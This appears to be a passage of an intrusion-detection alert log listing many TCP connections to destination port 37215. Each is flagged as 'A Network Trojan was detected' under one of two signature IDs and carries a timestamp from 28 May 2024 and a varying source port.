          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991744
          SID:2829579
          Source Port:44882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778603
          SID:2829579
          Source Port:50674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667880
          SID:2829579
          Source Port:46742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698258
          SID:2829579
          Source Port:59144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538754
          SID:2835222
          Source Port:59508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320990
          SID:2829579
          Source Port:41644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780925
          SID:2829579
          Source Port:51252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338723
          SID:2829579
          Source Port:48290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124650
          SID:2835222
          Source Port:56254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560592
          SID:2829579
          Source Port:55812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138365
          SID:2835222
          Source Port:43264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115619
          SID:2835222
          Source Port:59884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668259
          SID:2829579
          Source Port:41070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922842
          SID:2829579
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084741
          SID:2829579
          Source Port:43356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084802
          SID:2835222
          Source Port:47292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.150973
          SID:2829579
          Source Port:52770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745663
          SID:2829579
          Source Port:40166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.611507
          SID:2835222
          Source Port:55426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126807
          SID:2829579
          Source Port:60088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591317
          SID:2835222
          Source Port:47728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741806
          SID:2835222
          Source Port:46306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588863
          SID:2829579
          Source Port:60344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665406
          SID:2829579
          Source Port:34830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660401
          SID:2829579
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.596946
          SID:2835222
          Source Port:37636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093789
          SID:2835222
          Source Port:36800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756822
          SID:2835222
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008795
          SID:2829579
          Source Port:57308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190308
          SID:2835222
          Source Port:37642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760445
          SID:2835222
          Source Port:57804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979367
          SID:2835222
          Source Port:34616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711507
          SID:2835222
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726965
          SID:2835222
          Source Port:33250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529164
          SID:2829579
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736689
          SID:2835222
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215939
          SID:2829579
          Source Port:42176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680656
          SID:2829579
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269823
          SID:2835222
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434813
          SID:2835222
          Source Port:33680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.351099
          SID:2829579
          Source Port:56956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818642
          SID:2835222
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528802
          SID:2835222
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815427
          SID:2835222
          Source Port:39358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870625
          SID:2835222
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965191
          SID:2829579
          Source Port:42802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669710
          SID:2835222
          Source Port:43312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269817
          SID:2835222
          Source Port:45998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.711066
          SID:2835222
          Source Port:36012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266763
          SID:2835222
          Source Port:33164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860375
          SID:2835222
          Source Port:43360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590705
          SID:2835222
          Source Port:33964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892903
          SID:2835222
          Source Port:33272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529129
          SID:2835222
          Source Port:52214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.951905
          SID:2835222
          Source Port:38012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241084
          SID:2835222
          Source Port:44558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221445
          SID:2835222
          Source Port:39900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287659
          SID:2829579
          Source Port:42716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537699
          SID:2835222
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067541
          SID:2835222
          Source Port:57266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893764
          SID:2829579
          Source Port:39138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177258
          SID:2835222
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.248564
          SID:2829579
          Source Port:53920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401038
          SID:2829579
          Source Port:35228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709130
          SID:2829579
          Source Port:55656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178488
          SID:2835222
          Source Port:33370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708409
          SID:2829579
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039568
          SID:2829579
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.443293
          SID:2829579
          Source Port:39976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994846
          SID:2829579
          Source Port:54448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708922
          SID:2829579
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131670
          SID:2829579
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273487
          SID:2835222
          Source Port:59494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944159
          SID:2829579
          Source Port:36886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.633292
          SID:2835222
          Source Port:49344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525478
          SID:2835222
          Source Port:33216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216356
          SID:2829579
          Source Port:53956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793560
          SID:2829579
          Source Port:43478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195879
          SID:2835222
          Source Port:58136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974934
          SID:2835222
          Source Port:34066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973115
          SID:2835222
          Source Port:56716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287657
          SID:2835222
          Source Port:39208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485392
          SID:2829579
          Source Port:38994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664747
          SID:2829579
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.561988
          SID:2835222
          Source Port:48856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652332
          SID:2829579
          Source Port:41158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414272
          SID:2835222
          Source Port:34288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288386
          SID:2835222
          Source Port:56668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.342322
          SID:2835222
          Source Port:55594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529985
          SID:2835222
          Source Port:33168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089759
          SID:2835222
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222572
          SID:2829579
          Source Port:45358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879301
          SID:2835222
          Source Port:37730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.891164
          SID:2835222
          Source Port:55068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549427
          SID:2829579
          Source Port:59498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203067
          SID:2835222
          Source Port:58624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330011
          SID:2835222
          Source Port:43272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891690
          SID:2829579
          Source Port:55574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471217
          SID:2829579
          Source Port:36382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085349
          SID:2835222
          Source Port:36364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774315
          SID:2829579
          Source Port:40122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711051
          SID:2835222
          Source Port:55274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.871011
          SID:2835222
          Source Port:41752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891714
          SID:2835222
          Source Port:47142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.554281
          SID:2829579
          Source Port:45786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272652
          SID:2835222
          Source Port:57280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273178
          SID:2835222
          Source Port:36290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562969
          SID:2829579
          Source Port:52042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143711
          SID:2835222
          Source Port:34518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064037
          SID:2829579
          Source Port:52510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475380
          SID:2835222
          Source Port:55254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151965
          SID:2835222
          Source Port:60786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270390
          SID:2835222
          Source Port:38508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214629
          SID:2829579
          Source Port:60704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528190
          SID:2829579
          Source Port:55498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595024
          SID:2829579
          Source Port:59068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161951
          SID:2835222
          Source Port:35740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425996
          SID:2829579
          Source Port:42496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334567
          SID:2829579
          Source Port:49518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202032
          SID:2829579
          Source Port:50726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124694
          SID:2829579
          Source Port:56646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330166
          SID:2829579
          Source Port:40242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325305
          SID:2829579
          Source Port:49048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176454
          SID:2835222
          Source Port:48244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666586
          SID:2835222
          Source Port:57822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876935
          SID:2829579
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664301
          SID:2829579
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622189
          SID:2829579
          Source Port:50052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803856
          SID:2835222
          Source Port:55578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399493
          SID:2835222
          Source Port:51804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244730
          SID:2829579
          Source Port:48086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943507
          SID:2835222
          Source Port:37794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977577
          SID:2829579
          Source Port:59752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550383
          SID:2835222
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890809
          SID:2829579
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.624169
          SID:2835222
          Source Port:35154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022234
          SID:2829579
          Source Port:45322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680682
          SID:2829579
          Source Port:50652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845771
          SID:2835222
          Source Port:45812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039097
          SID:2829579
          Source Port:44430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195669
          SID:2829579
          Source Port:45118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756349
          SID:2835222
          Source Port:49808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727821
          SID:2835222
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713540
          SID:2835222
          Source Port:57056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977575
          SID:2835222
          Source Port:54362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859063
          SID:2835222
          Source Port:44672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543113
          SID:2829579
          Source Port:39734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630878
          SID:2829579
          Source Port:48038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339669
          SID:2829579
          Source Port:52052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.316530
          SID:2835222
          Source Port:58436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550643
          SID:2829579
          Source Port:33472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.910208
          SID:2835222
          Source Port:60330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369140
          SID:2835222
          Source Port:37126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677718
          SID:2835222
          Source Port:58468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843394
          SID:2835222
          Source Port:36088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841577
          SID:2835222
          Source Port:55462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065054
          SID:2835222
          Source Port:50156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223835
          SID:2829579
          Source Port:54538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923802
          SID:2835222
          Source Port:57996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543644
          SID:2835222
          Source Port:34468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266517
          SID:2829579
          Source Port:54890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842322
          SID:2829579
          Source Port:51794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269752
          SID:2835222
          Source Port:45534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778789
          SID:2835222
          Source Port:46330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269833
          SID:2829579
          Source Port:33676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033250
          SID:2829579
          Source Port:45730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807874
          SID:2829579
          Source Port:34466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115831
          SID:2829579
          Source Port:39256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299586
          SID:2829579
          Source Port:38374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922038
          SID:2829579
          Source Port:47490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064215
          SID:2835222
          Source Port:58418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771516
          SID:2835222
          Source Port:42176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.340998
          SID:2835222
          Source Port:59126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067315
          SID:2835222
          Source Port:56596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591237
          SID:2835222
          Source Port:35788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473276
          SID:2835222
          Source Port:47634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171288
          SID:2829579
          Source Port:40044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210728
          SID:2829579
          Source Port:32834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985041
          SID:2829579
          Source Port:37920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025864
          SID:2829579
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140211
          SID:2829579
          Source Port:58066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332656
          SID:2835222
          Source Port:47466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338637
          SID:2829579
          Source Port:49230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216267
          SID:2835222
          Source Port:45654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922097
          SID:2835222
          Source Port:49618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710768
          SID:2829579
          Source Port:44408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977113
          SID:2835222
          Source Port:42732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161758
          SID:2835222
          Source Port:43974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728008
          SID:2835222
          Source Port:44702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998418
          SID:2835222
          Source Port:51648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548002
          SID:2835222
          Source Port:33762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840586
          SID:2829579
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325782
          SID:2829579
          Source Port:35372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712085
          SID:2829579
          Source Port:53720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512332
          SID:2829579
          Source Port:39094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188458
          SID:2829579
          Source Port:33922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.891163
          SID:2835222
          Source Port:59680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
